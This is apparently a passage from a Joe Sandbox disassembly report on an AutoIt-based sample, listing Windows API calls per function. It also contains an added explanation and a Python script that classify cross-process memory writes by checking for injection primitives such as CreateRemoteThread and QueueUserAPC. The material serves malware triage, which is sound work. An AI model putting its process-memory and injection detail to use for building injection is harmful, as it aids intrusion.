                                                              • Instruction ID: bfb19a2de53be620c5cd3dced2ad20ce8388323f7fa4f7fd1f6c7990388129b3
                                                              • Opcode Fuzzy Hash: 1ec0f66b2b6496eeeaf1e073ba5ef5d7e16df9d8c8636171fc3a83632e08730d
                                                              • Instruction Fuzzy Hash: 79416076900119AFDF10EFA4CC41AEEBBB8EB09300F0441AAF955B7251DA746E45CBA4
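The entry above (the function at 0048983F with its subcalls 004913DE, 004914BC and 00491487) is the call chain a sandbox flags as writing to foreign memory: GetWindowThreadProcessId on a window, OpenProcess with access mask 00000438 (PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION), VirtualAllocEx with MEM_COMMIT (00001000) and protection 00000004 (PAGE_READWRITE), WriteProcessMemory, SendMessageW, then ReadProcessMemory. What is absent matters as much as what is present: there is no CreateRemoteThread, SetThreadContext or QueueUserAPC, the allocation is not executable, and the buffer is read back after a window message. The two messages are TVM_GETITEMRECT (0x1104) and TVM_HITTEST (0x1111), both of which take an lParam pointer that must be valid in the window owner's address space, so this shape is what any program needs to query a common-controls TreeView in another process; together with the AutoIt3GUI string and SysTreeView32 handling in the neighbouring entries it is consistent with the interpreter's own control-automation code rather than with a payload injection. The script below is an added example, not part of the report, of Joe Sandbox or of the analysed sample. It parses entries in this listing format, decodes the access mask and allocation protection, and makes that distinction mechanically; the sample input is the entry's own lines, and the verdict names are mine.

```python
"""Triage helper for the per-function "APIs" lists in this report (added
example, not part of Joe Sandbox or of the analysed sample).

It parses call lines of the form
    • Part of subcall function XXXXXXXX: Api.MODULE(arg,arg,...), ref: XXXXXXXX
decodes the OpenProcess access mask and VirtualAllocEx protection, and
reports whether a function's foreign-memory writes come with an execution
primitive (injection) or only with a read-back after a window message
(a data buffer placed in the window owner's address space)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the APIs lines of the entry at ref 0048983F, copied from the report.
SAMPLE_ENTRY = """\
• Part of subcall function 004914BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00489296,?,?,00000034,00000800,?,00000034), ref: 004914E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0048983F
• Part of subcall function 00491487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004892C5,?,?,00000800,?,00001073,00000000,?,?), ref: 004914B1
• Part of subcall function 004913DE: GetWindowThreadProcessId.USER32(?,?), ref: 00491409
• Part of subcall function 004913DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0048925A,00000034,?,?,00001004,00000000,00000000), ref: 00491419
• Part of subcall function 004913DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0048925A,00000034,?,?,00001004,00000000,00000000), ref: 0049142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004898AC
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)

# Process access rights and page protections as defined in winnt.h.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# APIs that turn a write into another process into execution there.
EXEC_PRIMITIVES = {"CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx",
                   "RtlCreateUserThread", "SetThreadContext", "NtSetContextThread",
                   "QueueUserAPC", "NtQueueApcThread"}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str] = None  # function the sandbox attributes the call to


def parse_calls(entry_text: str) -> List[Call]:
    """Parse one entry's APIs lines; lines that are not call lines are skipped."""
    calls = []
    for line in entry_text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def hex_arg(call: Call, index: int) -> Optional[int]:
    """Argument as an int, or None when the sandbox could not resolve it ('?')."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def decode_access_mask(mask: int) -> List[str]:
    """Expand an OpenProcess desired-access mask into named rights (unknown bits kept as hex)."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def classify(calls: List[Call]) -> Dict[str, object]:
    """Decide what kind of foreign-memory access one function performs."""
    apis = {c.api for c in calls}
    result: Dict[str, object] = {"apis": sorted(apis), "open_process_rights": [],
                                 "alloc_protect": None, "verdict": "no_foreign_write"}
    for c in calls:
        if c.api == "OpenProcess" and hex_arg(c, 0) is not None:
            result["open_process_rights"] = decode_access_mask(hex_arg(c, 0))
        if c.api == "VirtualAllocEx" and hex_arg(c, 4) is not None:
            result["alloc_protect"] = PAGE_PROTECT.get(hex_arg(c, 4), f"0x{hex_arg(c, 4):X}")
    if not {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory"} <= apis:
        return result
    if apis & EXEC_PRIMITIVES or result["alloc_protect"] in ("PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE"):
        result["verdict"] = "remote_code_execution_chain"
    elif "ReadProcessMemory" in apis and any(a.startswith("SendMessage") for a in apis):
        # Write a struct, send a message to the owning window, read the answer back:
        # the pattern for cross-process TVM_*/LVM_* queries, not for injection.
        result["verdict"] = "cross_process_window_read"
    else:
        result["verdict"] = "foreign_memory_write"
    return result


if __name__ == "__main__":
    print(classify(parse_calls(SAMPLE_ENTRY)))
```

Run it over any entry's APIs lines pasted from a report of this format. A "cross_process_window_read" verdict only says the function's shape matches control automation; a "remote_code_execution_chain" verdict (an execution primitive, or an executable allocation) is the one that warrants following the WriteProcessMemory buffer to see what is written.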
                                                              APIs
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,004BF910,00000000,?,?,?,?), ref: 004B79DF
                                                              • GetWindowLongW.USER32 ref: 004B79FC
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004B7A0C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Long
                                                              • String ID: SysTreeView32
                                                              • API String ID: 847901565-1698111956
                                                              • Opcode ID: 258dff27e05da3aae2445e321b0ff1cb366259ea346cfa967dfc1b61d876895e
                                                              • Instruction ID: 3d35068527774dba960274227ccf6cdfe6ff0b78c7809509a32f712a419652de
                                                              • Opcode Fuzzy Hash: 258dff27e05da3aae2445e321b0ff1cb366259ea346cfa967dfc1b61d876895e
                                                              • Instruction Fuzzy Hash: D931E171204206AFEB118F38CC41BEB77A9EB49324F204726F875932E0D738ED518B68
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004B7461
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004B7475
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 004B7499
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: SysMonthCal32
                                                              • API String ID: 2326795674-1439706946
                                                              • Opcode ID: 8799e555eef9929d65743e527e2311449b4084216e9a8f4f5e7c9558314bd9a6
                                                              • Instruction ID: f0ed8292e7beeab627d57249a067b08cdbd0f38f981b6cbd5e003414cdbbd1e7
                                                              • Opcode Fuzzy Hash: 8799e555eef9929d65743e527e2311449b4084216e9a8f4f5e7c9558314bd9a6
                                                              • Instruction Fuzzy Hash: 38219F32540218BBDF118F64CC46FEB3B69EB88724F110215FE156B2D0DAB9AC55DBA4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 004B7C4A
                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 004B7C58
                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004B7C5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                               • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DestroyWindow
                                                              • String ID: msctls_updown32
                                                              • API String ID: 4014797782-2298589950
                                                              • Opcode ID: f0d51814bb6669d3161f2fa1f2724a7b5dc3df5cb1e552df171087938abd07fc
                                                              • Instruction ID: 30e226a068256c13a82dc9390e38b3836fc3b5835ff0e6d5d4214d0798b1e58e
                                                              • Opcode Fuzzy Hash: f0d51814bb6669d3161f2fa1f2724a7b5dc3df5cb1e552df171087938abd07fc
                                                              • Instruction Fuzzy Hash: 8F216DB1204108AFDB10DF14DCC1DA73BACEB49398B14005AFA059B3A1CB75EC118AB4
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 004B6D3B
                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 004B6D4B
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 004B6D70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 07e4dc875ff0c2e1442eb7fe0b2d7b06fe48a9fd8faded7ffca5b7688b0f9e03
                                                              • Instruction ID: 7a05d17c9a144e4301427d5d65faa1e207a8e64369c2aac39169d35d84af8b6c
                                                              • Opcode Fuzzy Hash: 07e4dc875ff0c2e1442eb7fe0b2d7b06fe48a9fd8faded7ffca5b7688b0f9e03
                                                              • Instruction Fuzzy Hash: 5521B332600118BFDF118F54CC45FFB3BBAEF89754F028129F9455B2A0C6799C5197A4
                                                              APIs
                                                              • __snwprintf.LIBCMT ref: 004A3A66
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf_memmove
                                                              • String ID: , $$AUTOITCALLVARIABLE%d$%L
                                                              • API String ID: 3506404897-2952655123
                                                              • Opcode ID: 0aeeaf6444dfc5cdf7bb621e09da94bd422f85f0cc79ba743cc4c62a1177bed3
                                                              • Instruction ID: 81d4d209a21bb3768b80cdfff0c54c03e09ac0e2ca255a42007bc923672af35b
                                                              • Opcode Fuzzy Hash: 0aeeaf6444dfc5cdf7bb621e09da94bd422f85f0cc79ba743cc4c62a1177bed3
                                                              • Instruction Fuzzy Hash: 1621D771600218AFCF10EF55CC82EAEB7B4AF59305F50045FF449A7182EB38EA45CB69
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004B7772
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004B7787
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004B7794
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: d95081a6d7b482862e9a47de923438df400c95e2d48fea4248f28c7f382e6306
                                                              • Instruction ID: 4d002ee341036f4516498d048434b8dfb708241e377bf6e21e54254f52cb28f0
                                                              • Opcode Fuzzy Hash: d95081a6d7b482862e9a47de923438df400c95e2d48fea4248f28c7f382e6306
                                                              • Instruction Fuzzy Hash: 0D112732200208BFEF205F61CC01FEB77A8EFC8B54F11052AFA4192190C675E811CB24
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID: N$@BO
                                                              • API String ID: 3494438863-3527719973
                                                              • Opcode ID: dcb799494872f50fa8a5612cf66b0a1ae91f4076f6f735b4d3a21d77c7fa4f28
                                                              • Instruction ID: 30456713e9f58cedc83cb407f947787b8cf90f2b2998e9bc8037ac3aee294be5
                                                              • Opcode Fuzzy Hash: dcb799494872f50fa8a5612cf66b0a1ae91f4076f6f735b4d3a21d77c7fa4f28
                                                              • Instruction Fuzzy Hash: 6CF0CD71204A225BF7648F16BC51B733794E704335B92016FEA04DF187EB389845CACC
                                                              APIs
                                                              • __lock.LIBCMT ref: 00459B94
                                                                • Part of subcall function 00459C0B: __mtinitlocknum.LIBCMT ref: 00459C1D
                                                                • Part of subcall function 00459C0B: EnterCriticalSection.KERNEL32(00000000,?,00459A7C,0000000D), ref: 00459C36
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00459BA4
                                                                • Part of subcall function 00459100: ___addlocaleref.LIBCMT ref: 0045911C
                                                                • Part of subcall function 00459100: ___removelocaleref.LIBCMT ref: 00459127
                                                                • Part of subcall function 00459100: ___freetlocinfo.LIBCMT ref: 0045913B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                              • String ID: 8N$8N
                                                              • API String ID: 547918592-2090888977
                                                              • Opcode ID: b4b4c0219642781cebe0d1c177be5dfc987db7148f23142ad3a7d1283a012362
                                                              • Instruction ID: 400b8ae72845e6b40a1cf3a95068927f3f4dbad9022b707306787b2a0e685e7c
                                                              • Opcode Fuzzy Hash: b4b4c0219642781cebe0d1c177be5dfc987db7148f23142ad3a7d1283a012362
                                                              • Instruction Fuzzy Hash: ABE08671543351EEEA10F7A7A94372D76506B00727F20015FF855690C3DEFC2908851F
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00434BD0,?,00434DEF,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434C11
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00434C23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 6a5e8ac1967581cefa35dad01d767a06f40bda90f1aa0659b2094a184e98d471
                                                              • Instruction ID: 0ac4f03420925c1dac39e4d5aab1b6e5e6b11c277e9009490f686bcd3c1b6f45
                                                              • Opcode Fuzzy Hash: 6a5e8ac1967581cefa35dad01d767a06f40bda90f1aa0659b2094a184e98d471
                                                              • Instruction Fuzzy Hash: 9CD08C30510712CFCB205B75DC08247B6E5AF08342B119C3A9489C2650E6B8E8808618
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00434B83,?), ref: 00434C44
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00434C56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: c72dbb7b357fc79cfabcdc662476c91260f4ce7f67aaa5c06ab88f088c6a0b64
                                                              • Instruction ID: ff736fbbfc9e0f9ce16649831654e7fde91ea51e4d16e048d657f5d335459bc0
                                                              • Opcode Fuzzy Hash: c72dbb7b357fc79cfabcdc662476c91260f4ce7f67aaa5c06ab88f088c6a0b64
                                                              • Instruction Fuzzy Hash: 48D0C230510713CFC7204F36CC0824672D4AF04341F21DC3BD49AC6264E678E880CA18
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,004B1039), ref: 004B0DF5
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004B0E07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: 3f08a6163326457d7195897a896fd6371346c246eff9f70a8d7465fa83b254e7
                                                              • Instruction ID: 7b05e3af93d8642ffbb834e61b36acaf385eba6a70ebae9d3019088a3a7431c3
                                                              • Opcode Fuzzy Hash: 3f08a6163326457d7195897a896fd6371346c246eff9f70a8d7465fa83b254e7
                                                              • Instruction Fuzzy Hash: A9D0EC71510712DFD7205B79C80968776D5AF14352F118D3E9495D2690E6B8E8A08658
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,004A8CF4,?,004BF910), ref: 004A90EE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004A9100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 01bc308dea32346226bd5dd66a0382cdcba64908a0569a46468fe70c561e0fb5
                                                              • Instruction ID: faf8af35db1ce046db43d281dc2e505e7e37994fc1fe7cd97d2bb1bd206e368f
                                                              • Opcode Fuzzy Hash: 01bc308dea32346226bd5dd66a0382cdcba64908a0569a46468fe70c561e0fb5
                                                              • Instruction Fuzzy Hash: 93D0EC34510723DFEB209B35DC1864676D4AF15351B118D3AD499D6690E678DC848654
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: 01325be9e4c6051e35a4448efc3e6cc06b7580211db6628caa1201aa3ad72352
                                                              • Instruction ID: 1d1f92d7850e3c3dd8e182353387dc0caddab29a077c05ed2daa4556f180122f
                                                              • Opcode Fuzzy Hash: 01325be9e4c6051e35a4448efc3e6cc06b7580211db6628caa1201aa3ad72352
                                                              • Instruction Fuzzy Hash: B1D05B71804118FBC7189B959C89CFD737CA718302F104563F80AE2060E23D9B56D76F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a65d427c20d39d62de57b59e79ea3fbaba15adc0930c4c353b9c890cfb359279
                                                              • Instruction ID: ee2b8da15ca11c6c739890c66bc4d8178e52eac77f165498d78cee1b0589de84
                                                              • Opcode Fuzzy Hash: a65d427c20d39d62de57b59e79ea3fbaba15adc0930c4c353b9c890cfb359279
